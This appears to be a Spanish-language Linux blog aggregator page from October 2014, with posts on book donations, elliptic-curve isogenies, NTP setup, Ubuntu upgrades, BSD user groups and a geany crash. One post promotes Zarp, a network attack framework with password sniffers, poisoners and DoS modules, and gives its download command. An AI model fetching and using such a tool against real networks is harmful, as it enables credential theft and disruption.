Jueves 30 de octubre de 2014

César Yáñez Fernández

Donación de Libros

En el área de cómputo, al igual que en otras áreas y ciencias, existe mucha literatura, libros de texto, manuales, documentos, artículos, etcétera. Uno cuando empieza a recabar esta información, llega el momento que necesitas espacio.

Un libro es como un ser vivo, que necesita ser adoptado para que siga cumpliendo su función, para que se mantenga vivo. Es por esto que me doy a la tarea de crear una lista de libros que se encuentran disponibles para adoptar.

Si alguien quiere uno de los libros listados, se sugiere cumplir las siguientes condiciones:

  1. El libro no está en venta, ni tiene un precio definido.
  2. El libro es donado, no hay costo por el libro.
  3. Para pedir un libro, me pueden contactar personalmente.
  4. El libro será enviado por DHL sin costo, Correos de México no está aceptando libros.
  5. Si es revista o comic, será enviado por Correos de México.
  6. Si el solicitante prefiere otro método de envío (DHL, UPS), el solicitante deberá pagar por el envío.
  7. Si se solicita más de 1 libro, revista o comic, el paquete será enviado por DHL, y el solicitante deberá pagar por el envío.

La lista de libros aún no está completa, y no sólo habrá libros de cómputo, esta lista se irá actualizando con más libros y se eliminarán los que ya fueron adoptados.

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

OpenStack GDL November 2014

Registrate

Miércoles 29 de octubre de 2014

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

Guests in the classroom: @chemaserralde talks about real time scheduling

Last Wednesday I had the pleasure and honor to have a great guest again at my class: José María Serralde, talking about real time scheduling. I like inviting different people to present interesting topics to my students a couple of times each semester, and I was very happy to have Chema come again.

Chema is a professional musician (formally, a pianist, although he has far more skills than what a title would confer to him — Skills that go way beyond just music), and he had to learn the details on scheduling due to errors that appear when recording and performing.

The audio could use some cleaning, and my main camera (the only one that lasted for the whole duration) was by a long shot not professional grade, but the video works and is IMO quite interesting and well explained.

So, here is the full video (also available at The Internet archive), all two hours and 500MB of it for you to learn and enjoy!

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

j-invariante y anillo de endomorfismos de curvas elípticas (isogenias)

Ahora, estoy dedicándome a explorar el anillo de endomorfismos de una curva elíptica $latex C$
sobre un campo perfecto (todo polinomio irreducible sobre este campo tenga raíces diferentes) para poder hablar de aplicaciones criptográficas.

Estos campos perfectos por excelencia en criptografía son $latex \mathbb{F}_q$.

Vamos a definir algunas cosas para clasificarlas, ya que anteriormente nos habíamos dedicado a estudiar cada curva por separado, pero ahora queremos considerar TODAS las curvas elípticas sobre un campo $latex \mathbb{K}$ , y ver cuáles son isomorfas, y ver cada clase de curvas isomorfas como la misma curva,  como un sólo punto, este espacio es una espacio modular, y generalmente es estudiado como un esquema.

Algo interesante es que en las curvas elípticas es que este espacio tiene dimensión 1, y de hecho es una linea topológicamente hablando.

Como sabemos, una curva elíptica tiene una estructura algebraica y una estructura geométrica, las curvas elípticas son el caso más simple de una variedad abeliana, éstas tienen dimensión 1 (Es decir, al considerar su anillo de coordenadas, su dimensión de Krull es 1, lo cual se traduce a que la cadena más grande de ideales por contención que se puede construir $latex \lbrace J_i \rbrace$ es de altura 1 por lo que $latex J_0 \subset J_1 \subset J_2$ tenemos que $latex J_1 = J_2$ lo que hace al anillo Noetheriano.

Vamos a explorar un poco lo que es una curva elíptica desde el punto de vista más formal, y construiremos relaciones de éstas, clasificaciones, y exploraremos cómo se comporta el anillo de morfismos de la curva en si misma, así como la relación que hay entre la traza y determinante de ciertos endomorfismos con el subgrupo de torsión de la curva en cuestión.


Curva suave de género 1, entonces es elíptica

Todas las curvas de género 1 son elípticas, como lo pueden ver en este post via el teorema de Riemann-Roch , y la construcción de la ecuación en la forma de Weierstrass ahora redefiniremos de una curva elíptica, recordemos que en la estructura algebraica de la curva siempre hay un punto distinguido que nos sirve como identidad visto como variedad abeliana, llamémoslo $latex \mathcal{O}$ , entonces si tenemos que una curva $latex E$ es suave de género g=1 y proyectiva , entonces por el teorema de Riemann-Roch tenemos que si $latex n>2g-2=0$ tenemos que $latex \mathcal{L}(n0)=n-g+2=n$  si $latex n=2$ y $latex n=3$ podemos encontrar dos funciones $latex x,y\in \mathbb{K}(E)$ que tienen exactamente 2 polos en $latex \mathcal{O}$ y $latex y$ tiene 3 polos en $latex \mathcal{O}$ , ahora si $latex n=6$, obtenemos una base para el espacio vectorial $latex \mathcal{L}(6\mathcal{O})$ la cual es $latex \lbrace 1,x,x^2,x^3,y,y^2,xy \rbrace$

La cual nos da la forma usual de la curva elíptica en la forma de Weierstrass como todos la conocemos.

$latex y^2 + f_1xy+f_3y = x^3+f_2x^2 + f_4x + f_6$

tal que $latex f_i \in \mathbb{K}$

Aquí fuimos de álgebra directamente a geometría.

Ahora, ya para geometrizar esto por completo, considera:

$latex \Phi: E \rightarrow \mathbb{P}^{2}_{\mathbb{K}}$
$latex (x,y) \mapsto [x:y:1]$

Ahora, también por lo anterior y Riemann-Roch tenemos que $latex [\mathbb{K}(E):\mathbb{K}(x)]=2$ y que $latex [\mathbb{K}(E):\mathbb{K}(y)]=3$ lo cual implica que $latex [\mathbb{K}(E):\mathbb{K}(x,y)]=1$, por lo que $latex \Phi$ tiene grado 1, como por hipótesis tenemos que $latex E$ es suave, sabemos que su discriminante $latex \Delta\neq 0$ ,  es decir $latex \Phi(\mathcal{O})=[0:1:0]=\infty$  es el punto al infinito.


Isogenias

La palabra "isogenia" no me gusta, pero no sé cómo traducirla, en inglés se dice "isogeny" , pero bueno, hay poca literatura en español sobre curvas isógenas (o no he buscado bien... o no he buscado más bien en español).

Lo que queremos hacer ahora es definir homomorfismos entre curvas elípticas, es decir queremos comenzar a compararlas de tal manera que ésta comparación respete sus propiedades geometricas y algebraicas.

Sean $latex E$ y $latex F$ dos curvas elípticas sobre $latex \mathbb{K}$ , una isogenia es un mapeo racional $latex \alpha: E\rightarrow F$ que induce homomorfismo de grupos de $latex E(\mathbb{K})$ y $latex F(\mathbb{K})$ (es decir entre los grupos abelianos inducidos por la curva elíptica)


Para entender esta definición, como ya lo había definido en el post antes citado en este post, vamos a redefinir lo que es un campo de funciones de una curva proyectiva en general para saber qué es un mapeo racional.

Sea $latex C(\mathbb{K})$ una curva proyectiva definida por $latex f(x,y,z)=0$ donde $latex f\in \mathbb{K}[x,y,z]$ es irreducible en $latex f\in \bar{\mathbb{K}}[x,y,z]$.

El campo de funciones $latex \mathbb{K}(C)$ son las funciones $latex g/h$ tal que

$latex g,h$ polinomios homogéneos del anillo $latex \mathbb{K}[x,y,z]$ de mismo grado
$latex h\notin (f)$  (el ideal generado por f)
$latex g_1/h_1$ y $latex g_2/h_2$ son equivalentes cuando $latex g_1h_2-g_2h_1 \in (f)$

Si te da miedo lo proyectivo, aquí te dejo la definición afín, pero debes trabajar proyectivamente, aquí te dejo un post anterior sobre el espacio proyectivo.

$latex \mathbb{K}(C)=Frac(\mathbb{K}[C])=Frac(\mathbb{K}[x,y]/(f))$

Decimos que un mapeo racional entre dos curvas proyectivas

$latex \Phi: E \rightarrow F$
$latex P\mapsto [\phi_x(P):\phi_y(P):\phi_z(P)]$

Tal que $latex \phi_i \in \mathbb{K}(E)$

Decimos que el mapeo es regular en $latex P\in E(\bar{\mathbb{K}})$  (puntos de E con coordenadas en la cerradura del campo) si existe $latex g\in\bar{\mathbb{K}}(E)$ tal que $latex [g\phi_x(P):g\phi_y(P):g\phi_z(P)]$ está bien definida y no todos son coordenada 0 ($latex [0:0:0] \notin \mathbb{P}^2$).


Si un mapeo es regular en todos los puntos, decimos que es un morfismo , puede verse en el libro Advanced topics in the arithmetic of elliptic curves (Silverman) que si $latex E$ es suave proyectiva, entonces todo mapeo racional de $latex E$ a una curva proyectiva $latex F$ es un morfismo.

Tambien decimos que un isomorfismo entre curvas elípticas es una isogenia invertible.

Como ejemplos que pueden trabajar en casa, consideren los mapeos sobre una curva $latex E$ sobre el campo $latex \mathbb{F_q}$  con $latex q=p^n$

$latex P\mapsto 2P$

Pueden demostrar que eso realmente es una isogenia

También
$latex \pi:E \rightarrow E$
$latex [x:y,z] \mapsto [x^q:y^q:z^q]$

Donde este mapeo es el endomorfismo de Frobenius y tenemos que
$latex \hat{\pi}:\mathbb{F}_q \rightarrow \mathbb{F}_q$
$latex x\mapsto x^p$

Este mapeo es muy importante , ya que es un automorfismo, y tenemos que

$latex \pi(\mathbb{F}_q)$ deja fijos a los elementos $latex \mathbb{F}_p$


Ahora queremos representar explícitamente las isogenias entre curvas elípticas.

Lema: Si $latex E$ y $latex F$ son curvas elípticas sobre $latex \mathbb{K}$  en su forma estándar de Weierstrass (como en los ejemplos) y si $latex \alpha$ es una isogenia no trivial, entonces tiene la siguiente forma:

$latex \alpha(x,y)=\Big( \frac{u(x)}{v(x)} , \frac{s(x)}{t(x)}y \Big )$

donde

$latex u,v,s,t \in \bar{\mathbb{K}}[x]$

y las fracciones están reducidas (numerador y cocientes son primos relativos)


Esto es fácil demotrarlo, te dejo los hints porque es mucha talacha para que tú lo hagas.

Considera lo que ya sabemos, supón que $latex \alpha$ está definido por el mapeo racional $latex [\alpha_x:\alpha_y:\alpha_z]$, y considera para todo punto afín

$latex [x:y:1] \in E(\bar{\mathbb{K}})$

$latex \alpha(x,y)=\Big ( r_1(x,y), r_2(x,y) \Big )$  donde $latex r_1(x,y)=\alpha_x(x,y,1)/\alpha_z(x,y,1)$ y $latex r_2(x,y)=\alpha_y(x,y,1)/\alpha_z(x,y,1)$

utilizando la relación de $latex E$ que ya conoces entre $latex x,y$ que es $latex y^2=x^3+ax+b$ elimina los factores $latex y^n$ y reescribe $latex r_1(x,y)=\frac{p_1(x)+p_2(x)y}{p_3(x)+p_4(x)y}$, multiplica el numerador y denominador por $latex p_3(x)-p_4(x)y$ y vuelve a reducir los $latex y^n$

Eso te dara otra versión de $latex \alpha$ que también tiene $latex y$, pero considera la simetría de la curva y el inverso de los puntos... sabes que $latex \alpha(x,-y)=-\alpha(x,y)$ por lo que deben haber cosas que se hagan 0, el argumento en $latex \alpha_y$ es similar.

El grado de una isogenia se define bajo esta representación tan cómoda como $latex \partial(\alpha):=max\lbrace u,v\rbrace$, y decimos que la isogenia $latex \alpha$ es separable si la derivada de $latex \frac{u}{v}$ NO es la función 0

El grado jugara un papel importante para despues definir otras cosas y jugar con la funcion zeta elíptica y el teorema de Hasse.

Corolario-Definición

Si $latex \alpha(x,y)$ es una isogenia como en el lema pasado, $latex v,t$ tienen las mismas raíces, y justamente estas raíces corresponden al kernel de $latex \alpha$



Teorema-Definición: 
Sea $latex \alpha: E\rightarrow F$ una isogenia con $latex \partial(\alpha)=n$ separable, entonces existe una única isogenia $latex \hat\alpha:F\rightarrow E$ tal que $latex \hat\alpha \circ \alpha = [n]$ , y le llamamos isogenia dual de $latex \mathbb{\alpha}$


Cosas que se pueden demostrar es que si $latex \alpha:E\rightarrow F$ y $latex \beta:E\rightarrow F$ entonces $latex \hat{\alpha+\beta}=\hat\alpha+\hat\beta$ y que $latex \alpha + \hat\alpha = 1 + \partial(\alpha)-\partial(1-\alpha)$, lo cual nos lleva a que definamos la traza  de un endomorfismo

$latex tr(\alpha)=tr(\hat\alpha)=\alpha+\hat\alpha$

Nota que tenemos que $latex \alpha\cdot \hat\alpha=[\partial(\alpha)]$ (en la misma curva elíptica) por lo que $latex \partial(\hat\alpha) = \partial(\alpha)$

Lo anterior nos lleva a un teorema importante que nos relaciona con un polinomio cuadrático cada endomorfismo.

Teorema: 

Sea $latex \alpha \in End_\mathbb{K}(E)$ , entonces $latex \alpha$ y $latex \hat\alpha$ son raíces del polinomio característico

$latex \xi(\lambda)=\lambda^2 - (tr\alpha)\lambda + \partial(\alpha) = 0$

Esto es muy fácil de probar

$latex \alpha^2 -(tr\alpha)\alpha+\partial(\alpha)=\alpha^2 - (\alpha+\hat\alpha)\alpha + \hat\alpha\alpha = 0$  lo mismo para $latex \hat\alpha$.

Ahora... como última parte de esta sección, consideremos el campo de caracteristica p y vamos a restringir los endomorfismos al subgrupo de torsión de la curva elíptica, es decir, sólo los evaluaremos en elementos de $latex E[n]$
y si $latex \alpha \in latex End(E)_\mathbb{K}$ a la restricción de $latex \alpha\mid_{E[n]}$ la redefiniremos como:

$latex \alpha_n$

Esta $latex \alpha_n$ es un endomorfismo del subgrupo abeliano $latex E[n]$ ya que $latex \alpha$ es un morfismo y manda puntos de torsión a puntos de torsión y como vimos anteriormente:

$latex E[n] \cong \mathbb{Z}/n\mathbb{Z} \oplus \mathbb{Z}/n\mathbb{Z}$, considera una base para $latex E[n]$ , llámale $latex (P_1,P_2)$

entonces podemos representar en forma de matriz a $latex \alpha_n=\begin{pmatrix}a&b\\c&d\end{pmatrix}$ donde $latex a,b,c,d \in \mathbb{Z}/n\mathbb{Z}$ y $latex \alpha(P_1)=aP_1\oplus cP_2$ y $latex \alpha(P_2)=bP_1+dP_2$ , la representación de la matriz depende de la base, pero la traza  $latex tr \alpha_n$ y $latex det \alpha_n$ no.


Lo que nos deja con este teorema que es MUY importante, ya que es la conexión más importante que hay entre los endomorfismos y las restricciónes a $latex E[n]$


Teorema: 
Sea $latex \alpha \in End_\mathbb{K}(E)$ con $latex E$ elíptica sobre $latex \mathbb{K}$  y sea $latex n$ un número positivo primo relativo a la característica de $latex \mathbb{K}$

entonces:

$latex tr \alpha \equiv tr \alpha_n \bmod n$   y    $latex \partial(\alpha) \equiv det(\alpha_n) mod n$


Con esto ya estamos bien equipados.

j-Invariante


Ahora, ya que sabemos que todas las curvas de género 1 son elípticas, hay una manera de clasificarlas muy eficientemente, consideremos $latex \mathcal{E}$ como el espacio de todas las curvas elípticas sobre $latex \mathbb{K}$ , entonces existe una función

$latex j: \mathcal{E} \rightarrow \mathbb{K}$

Llamada j-invariante que cumple que:

$latex j(E)=j(F)\Leftrightarrow E \cong F$ sobre $latex \bar{\mathbb{K}}$

Se ha demostrado que la función $latex j$ es suprayectiva, por lo que $latex \mathbb{K}$ es el espacio modular de dimensión 1y tenemos que las fibras $latex j^{-1}(x)$ son clases de $latex \bar{\mathbb{K}}$-isomorfismos de curvas elípticas definidas sobre $latex \mathbb{K}$

Las curvas elípticas que generalmente usamos en criptografía son de la forma

$latex E:=y^2 - x^3 - px -q $

Por lo que podemos expresar el j-invariante de manera más reducida como:

$latex j(E)=1728 \frac{4p^3}{4p^3+27q^2}$

Torsiones cuadráticas de curvas elípticas

Aquí no voy a entrar tanto en detalle porque tengo poca experiencia pero es importante.

Imagina que tenemos las curvas $latex E$ y $latex F$ definids sobre $latex \mathbb{K}$ tal que existe un isomorfismo $latex E\rightarrow F$ sobre $latex \bar{\mathbb{K}}$ pero no sobre $latex \mathbb{K}$ , decimos en este caso que $latex E$ y $latex F$ son torsiones.

Ejemplo:

Considera las curvas $latex E:y^2=x^3+11664$ y $latex F:y^2=x^3+1$

Ambas suaves y lindas definidas sobre $latex \mathbb{Q}$ , estas curvas NO pueden ser isomorfas sobre $latex \mathbb{Q}$ ya que $latex F$ tiene un punto de orden 2 $latex (-1,0)$ y $latex E$ no tienen ningun punto de orden 2 (el punto de orden 2 en este caso como son simetricas son el eje x , tendria que se un punto de weierstrass, lo cual implica que x=0 por lo que $latex y\notin \mathbb{Q}$)

Pero ahora considera las curvas en la extensión cuadrática $latex \mathbb{Q}(\sqrt{2})$,
aquí podemos definir el isomorfismo:

$latex \Psi: E \rightarrow F$
$latex (x,y) \mapsto (2^3 3^6 \sqrt{2}\cdot x , 2^2 3^3\cdot y)$

Por lo que decimos que $latex E$ y $latex F$ son twists cuadráticos.

Por lo anterior... deberían de tener el mismo j-invariante, el cual es claramente 0, por lo que todas las curvas existentes con j-invariante 0 , serán isomorfas a estas que ejemplificamos en alguna extensión del campo en el que estén trabajando.


Subgrupo de torsión y endomorfismo de una curva elíptica

Sabemos que el mapeo que manda a multiplicar por $latex [n]$ los puntos de una curva $latex E$ es un morfismo, al kernel de este mapeo le llamamos subgrupo de torsión y lo denotamos como $latex E[n]$ , y tenemos el siguiente teorema cuando $latex K$ tiene caracteristica p

$latex E[n]\cong \mathbb{Z}/n\mathbb{Z}\oplus \mathbb{Z}/n\mathbb{Z}$ si $latex p=0$ o $latex p\ndiv n$

o

$latex E[n]\cong \mathbb{Z}/n\mathbb{Z}$ o $latex \lbrace 0\rbrace 0$  si $latex p>0$ y $latex n=p^m$

Qué corolario de este teorema pueden deducir de $latex E[p]$ ?

Pero lo que diremos es que en un campo de caracteristica positiva , si $latex E[p]\cong \mathbb{Z}/p\mathbb{Z}$ le llamamos a la curva $latex E$ ordinaria, y si es $latex E[p]\cong \lbrace 0\rbrace $ supersingular.


Ahora, aquí el anillo de Endomorfismos  de la curva $latex E$ los denotamos como $latex End_\mathbb{K}(E)$
y tenemos que las isogenias $latex \alpha:E\rightarrow E$ son endomorfismos, y forman un anillo

bajo las siguientes operaciones

$latex \alpha,\beta \in End_\mathbb{K}(E)$

$latex (\alpha + \beta)(P)=\alpha(P)\oplus\beta(P)$
$latex (\alpha\cdot \beta)(P)=(\alpha \circ \beta)(P)$

donde $latex \oplus$ es la adición elíptica .

Tenemos que ahora con esto podemos construir una infinidad de elementos ya que $latex [n] \ in End_\mathbb{K}(E)$

esto debería ser para ustedes pero lo pongo.

$latex (\alpha\cdot [n])(P)=\alpha(nP)=\alpha(\bigoplus_{i=1}^n {P}) = \bigoplus_{i=1}^n { \alpha(P) }=n\alpha(P)=([n]\cdot \alpha(P)$

Esto nos dice que $latex \mathbb{Z}$ es un subanillo de $latex End_\mathbb{K}(E)$ , lo puedes observar viendo como se comporta la composición y la suma de $latex [n]$ y $latex [m]$ , verás que forman un anillo esos endomorfismos y son isomorfos a $latex \mathbb{Z}$

Este anillo de endomorfismos no sólo tiene a $latex \mathbb{Z}$ , como vimos, también está el endomorfismo $latex \pi$ de Frobenius (con $latex \mathbb{K}$ de caracteristica p>0 como el caso de criptografía) y pues por lo tanto todas las composiciones y sumas de éste con los isomorfos a $latex \mathbb{Z}$ cuando la curva $latex E$ es supersingular, este anillo de endomorfismos se comporta como un álgebra de cuaternios y no es conmutativo.



Espero les haya interesado, cualquier duda o corrección háganmela saber

Eduardo Ruíz Duarte (beck)
Twitter: @toorandom


Alcance Libre: Zentyal 4.0
Alcance Libre: Evita el apocalipsis de los servidores DHCP en CentOS 6.6.

Martes 28 de octubre de 2014

Xenode Systems: 5 consejos infalibles para volver a disfrutar del email

Lunes 27 de octubre de 2014

Actualizar servidor NTP

Eh usado debian por años, así que me confíe con un servidor NTP de CENAM y hoy tuve que hacer el cambio, así que les debo una hora a unos clientes:

Buscamos el archivo /etc/ntp.conf y añadimos:

server 0.north-america.pool.ntp.org
server 1.north-america.pool.ntp.org
server 2.north-america.pool.ntp.org
server 3.north-america.pool.ntp.org

Una vez ya guardado el archivo ntp.conf reiniciamos el NTP:

/etc/init.d/ntp restart

Ya solo nos queda elegir nuestra zona horaria con dpkg-reconfigure tzdata:

root@gob:~ dpkg-reconfigure tzdata
......
.....
...
Current default time zone: 'America/Mexico_City'
Local time is now:      Mon Oct 27 10:44:03 CST 2014.
Universal Time is now:  Mon Oct 27 16:44:03 UTC 2014.

root@gob:~ date
Mon Oct 27 10:44:08 CST 2014

Para validad los servidores a los cuales estamos conectados podemos verificar con ntpq y ntpdate, a mi me gusta juntar ntpq con watch:

Every 2.0s: ntpq -p                                         Mon Oct 27 15:42:49 2014

     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
-199.167.29.243  204.9.54.119     2 u  423 1024  377  123.771    4.952   0.579
*tick.nullmodem. 128.10.19.24     2 u  489 1024  377  102.143   -1.156   0.066
+bindcat.fhsu.ed 128.138.140.44   2 u  358 1024  377  124.133   -0.107   0.535
+pegasus.latt.ne 68.3.33.115      2 u  229 1024  377  105.379    3.391   0.200

El * indica con que servidor estoy sincronizado, reach indica la conectividad hacia el servidor la máxima es 337 y st indica el stratus de hora).

Si tienes un servidor NTP, en el cual trabajen todos tus equipos entonces puedes usar ntpdate -d, este checa el servidor NTP que le pongas y verifica la diferencia de tiempos pero no modificará el reloj de su sistema:

root@gob:~ ntpdate -d 128.10.19.24
27 Oct 15:48:39 ntpdate[5652]: ntpdate 4.2.6p5@1.2349-o Sat May 12 09:07:19 UTC 2012 (1)
transmit(128.10.19.24)
receive(128.10.19.24)
transmit(128.10.19.24)
receive(128.10.19.24)
transmit(128.10.19.24)
receive(128.10.19.24)
transmit(128.10.19.24)
receive(128.10.19.24)
server 128.10.19.24, port 123
stratum 1, precision -16, leap 00, trust 000
refid [CDMA], delay 0.12979, dispersion 0.00017
transmitted 4, in filter 4
reference time:    d7f93c2e.33ab649e  Mon, Oct 27 2014 15:48:30.201
originate timestamp: d7f93c3d.a2365cb6  Mon, Oct 27 2014 15:48:45.633
transmit timestamp:  d7f93c3d.959cb47c  Mon, Oct 27 2014 15:48:45.584
filter delay:  0.13020  0.12979  0.13014  0.12999
         0.00000  0.00000  0.00000  0.00000
filter offset: -0.00379 -0.00383 -0.00359 -0.00361
         0.000000 0.000000 0.000000 0.000000
delay 0.12979, dispersion 0.00017
offset -0.003835

27 Oct 15:48:45 ntpdate[5652]: adjust time server 128.10.19.24 offset -0.003835 sec

Sí lo que no tiens es tiempo, necesitas hacerlo inmediatamente puedes hacerlo de la siguiente manera: ntpdate -u SERVIDOR_NTP_PERSONALIZADO, se sincroniza y listo.

$ ntpdate servidorNTP
27 Oct 16:03:28 ntpdate[29676]: adjust time server servidorNTP offset -0.003151 sec

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Ubuntu 14.10 Utopic Unicorn disponible

Canonical ha lanzado y puesto disponible la versión 14.10 de nombre clave Utopic Unicorn desde el día 23 de octubre. Esta versión puedes descargar e instalar los archivos .iso de las diferentes ediciones de Ubuntu. Descargar Ubuntu 14.10 Utopic Unicorn Esta versión ha recibido algunas criticas ya que no contiene muchas diferencias con respecto a […]
Julio Mayorga

Julio Mayorga
Blog 123Hosting.com.mx

Google está trabajando en un nuevo algoritmo antipiratería por presiones de la DCMA

Google está trabajando en un nuevo algoritmo antipiratería por presiones de la DCMA

Las entidades de gestión acusan a Google de no hacer lo suficiente para luchar contra la piratería, por lo que la compañía del buscador está desarrollando un nuevo algoritmo antipiratería que llegará a los resultados de búsqueda en los próximos meses.
Google y la DCMA. Este binomio es el que más está dando que hablar en los últimos años. En primer lugar porque la entidad de gestión de Estados Unidos acusa a Google de no hacer suficiente contra la piratería. Y en sentido contrario Google dice que hace todo lo que puede contra la piratería. En ese sentido, la compañía del buscador se ha puesto a manos a la obra y está trabajando en un nuevo algoritmo antipiratería que estará integrado en las búsquedas en los próximos meses.

En este sentido, Google se comprometió con DCMA en 2012 a mejorar el sistema antipiratería, pero las entidades de gestión dijeron que las mejoras introducidas en el buscador no tenían el impacto suficiente en los sitios en los grandes con grandes cantidades de piratería como The Pirate Bay, y que los usuarios seguían accediendo a contenido pirateado a través de l buscador de forma cada vez más alarmante.

A pesar de que las medidas en YouTube están teniendo un efecto positivo, con casi un pago de mil millones de dólares a los titulares de derechos a través de Content ID, el buscador no tiene un sistema con tanta efectividad el en buscador. Por lo que las entidades de gestión siguen presionando a Google para que se ponga las pilas. No obstante, Google va volver a cambiar el algoritmo antipiratería para dirigir a los usuarios a sitios con contenido legítimo, y en el mismo sentido, hacer que el downrank perjudique a aquellos sitios con contenidos que han recibido solicitudes constantes de la DCMA, y que seguros que habréis visto por el buscador constantemente como enlace censurado.

Sinceramente no está muy claro que esta injerencia en los resultados sea muy positiva para la libertad de la red, pero con el debate de la piratería y la propiedad intelectual en boca de las administraciones y entidades de gestión, no me extraña nada que Google haga lo posible para mantenerlas contentas. Al final los perjudicados somos los usuarios, como siempre.

Fuente: alt1040.com

Julio Mayorga

Julio Mayorga
Blog 123Hosting.com.mx

Zarp – Network Attack Framework

Zarp es una herramienta escrita en python de ataque a redes en entornos locales. Posee varias herramientas
como sniffers los cuales permiten analizar automáticamente los nombres de usuario y contraseñas de diversos protocolos,
así como ver el tráfico HTTP y más.
Entre sus funciones estan:

- Poisoners
- Parameter
- Services
- Sessions
- Scanners
- DoS Attacks
- Sniffers

Descarga: git clone git://github.com/hatRiot/zarp.git
Mas informacion: https://defense.ballastsecurity.net/wiki/index.php/Zarp
https://github.com/hatRiot/zarp

Julio Mayorga

Julio Mayorga
Blog 123Hosting.com.mx

Pasar de Ubuntu 14.04 a 14.10

Con estos sencillos pasos podemos pasar de Ubuntu 14.04 a 14.10

Comenzaremos abriendo una terminal y colocando lo siguiente:

  1. sudo apt-get update && sudo apt-get dist-upgrade

Al finalizar insertamos este otro comando

  1. sudo update-manager -d

Ahora veremos algo como lo siguiente:

Simplemente damos click en el boton Upgrade. Veremos el siguiente cartel y nuevamente presionamos en Upgrade

Ahora solo resta esperar a que finalice

Despues de unos minutos, nos aparecerá el siguiente cartel, en el cual presionaremos Start Upgrade

Seguido a eso, el sistema empezara a obtener los nuevos paquetes de Ubuntu

Luego comenzará a instalar todos esos paquetes descargados

Finalmente reiniciamos la PC y ya podremos disfrutar de nuestro ubuntu 14.10

Sábado 25 de octubre de 2014

Farid Bielma

¿Quiénes ganan y quiénes pierden con la Reforma Energética?

Promulgación de la Reforma Energética por el presidente Enrique Peña

Promulgación de la Reforma Energética por el presidente Enrique Peña

En recientes presentaciones me han preguntado sobre mi opinión personal de los pros y contras de la Reforma Energética y apertura del sector a inversión privada. En esta ocasión no quiero hablar sobre los contras, ya que deseo centrar este análisis en los beneficios que pueden obtener cientos de empresas mexicanas, aquí algunos de mis comentarios:

  • Llegarán un número importante de empresas extranjeras, muchas de ellas con su cadena de suministro de proveedores bien establecida, a pesar de ello, varias compañías desarrollarán estrategias de desarrollo de proveedores locales, solo las empresas con altos estándares de calidad, capacidad y recurso humano competitivo podrán aprovechar los nuevos proyectos que se desarrollarán. Es necesario que muchas empresas mexicanas superen la barrera del idioma al lenguaje de negocios: inglés, y que obtengan certificaciones de calidad ISO o alguna norma internacional.
  • El propio CONACYT ha detectado que existe insuficiencia en mano de obra calificada en el país y en número de empresas que ofrezcan valor agregado a sus servicios, por ello, impulsará un ambicioso programa para capacitar a 200,000 jóvenes en áreas de ingeniería del sector energético, además de ello, las empresas tendrán apoyos de Secretaría de Energía y Secretaría de Economía para desarrollar competencias internacionales.
  • Las empresas que tengan como modelo de negocio desarrollar nuevos productos, procesos y modelos para el sector, y que puedan detectar necesidades o fallas en el mercado tendrán un crecimiento exponencial, empresas que visualicen esas oportunidades y obtengan información de inteligencia competitiva estarán un paso adelante de competidores.
Xenode Systems: Firmar digitalmente tus correos en Thunderbird

Viernes 24 de octubre de 2014

César Yáñez Fernández

Resucitando a BSD (en México)

Érase una vez...

Hace poco más de 10 años, que había mucho ímpetu y movimiento de grupos de usuarios, que además de los ya conocidos grupos de usuarios de Linux, los grupos de usuarios de BSD; siendo concretos, los de FreeBSD, los de NetBSD y los de OpenBSD, en esos se conocieron amistades largas...

Esos usuarios han crecido, se han casado, han creado familia, y muchos por cuestiones de responsabilidades y trabajo, hemos dejado a un lado los foros y listas de correo. BSD sigue usándose mucho, tanto en productos propietarios (como NetScaler de Citrix); y en empresas conocidas (el caso de Netflix).

La lista de correo de NetBSD México lleva meses sin actividad, y seguro no es la única; hay algunos artículos en borrador, pendientes de publicarse en el sitio, y hasta siento feo verlo acumulando polvo.

Hace unos años, escribí hacia dicha lista sobre qué se puede hacer para retomar estos trabajos, que si bien nuestras responsabilidades no nos permiten que lo tengamos actualizado diariamente, podemos darnos 1 hora a la semana para mantenerlo vigente.

Esos puntos que escribí en la lista, quiero exponerlos aquí, digo, son solo unas vagas ideas de qué se puede hacer; seguro habrá opiniones propias, pero que se pueden tomar en cuenta.

Unificar el contenido generado

Hay varios sitios con dominio MX que se rodean alrededor de FreeBSD, NetBSD y OpenBSD, que siguen todavía vigentes aunque los sitios ya no tienen actualizaciones, lo que creo mejor es que se unifiquen todos en un solo lugar, o que apunten a un solo lugar, y que se platique en general de:

De la misma manera, se pueden unificar los foros y listas de correo, manteniendo un idioma común.

Generación de contenido

Ya he comentado y dejado claro que el contenido ahí sigue, pero que ya no se ha generado seguimiento, es difícil para muchos escribir una entrada de blog en un lugar específico solo para decir: “¡FreeBSD 10 a sido liberado! ¡Yay!”.

Lo que se puede hacer es compartir información de cómo resolvieron un problema en algún BSD que usen; es contenido que no tiene que estar todo el tiempo actualizándose, pero se puede tener como referencia cuando tengamos un problema similar; con esto, también evangelizando acerca de estas tecnologías libres.

Tendencias

¿En qué lugar se puede colocar a los BSD con las tendencias tecnológicas actuales (llámese Virtualización, Nube, Big Data, etcétera)?

BSD aún tiene cabida en estos nichos, principalmente en NAS, SAN, Virtualización y Nubes públicas, hay que experimentar con las tecnologías abrigadas por algún proyecto BSD y compartir sus casos de uso.

Planeta

Va de la mano con generación de contenido. Planeta Linux es un excelente lugar para reunir diferentes blogs de usuarios, y no está peleado con BSD, se puede usar este, o también crear un Planeta BSD donde se indexen nuestros artículos relacionados.

Como he comentado, son ideas vagas que se pueden seguir, ojalá en poco tiempo podamos consensuar en una dirección, con muchos que no he conocido, de los usuarios que aún andan por ahí.

Antonio de Dios

Antonio de Dios
Webadedios » Linux

[fix] geany no inicia, “Attempt to unlock mutex that was not locked”

Hice una actualización, y después de unos días feliz intento abrir el editor geany y cual es mi sorpresa de toparme con el mensaje


toto@linux:~$ geany
Attempt to unlock mutex that was not locked
Abortado

Y pues efectivamente no abría, abortaba el inicio del programa.

corro entonces geany, dándole la instrucción geany -v, para leer el mensaje de donde podría estar el error, y veo que se detiene al momento de invocar los plugins


toto@sidux:~$ geany -v
Geany-INFO: Geany 1.24.1, es_MX.UTF-8
Geany-INFO: GTK 2.24.25, GLib 2.42.0
Geany-INFO: System data dir: /usr/share/geany
Geany-INFO: User config dir: /home/toto/.config/geany
Geany-INFO: System plugin path: /usr/lib/i386-linux-gnu/geany
Geany-INFO: Added filetype Go (58).
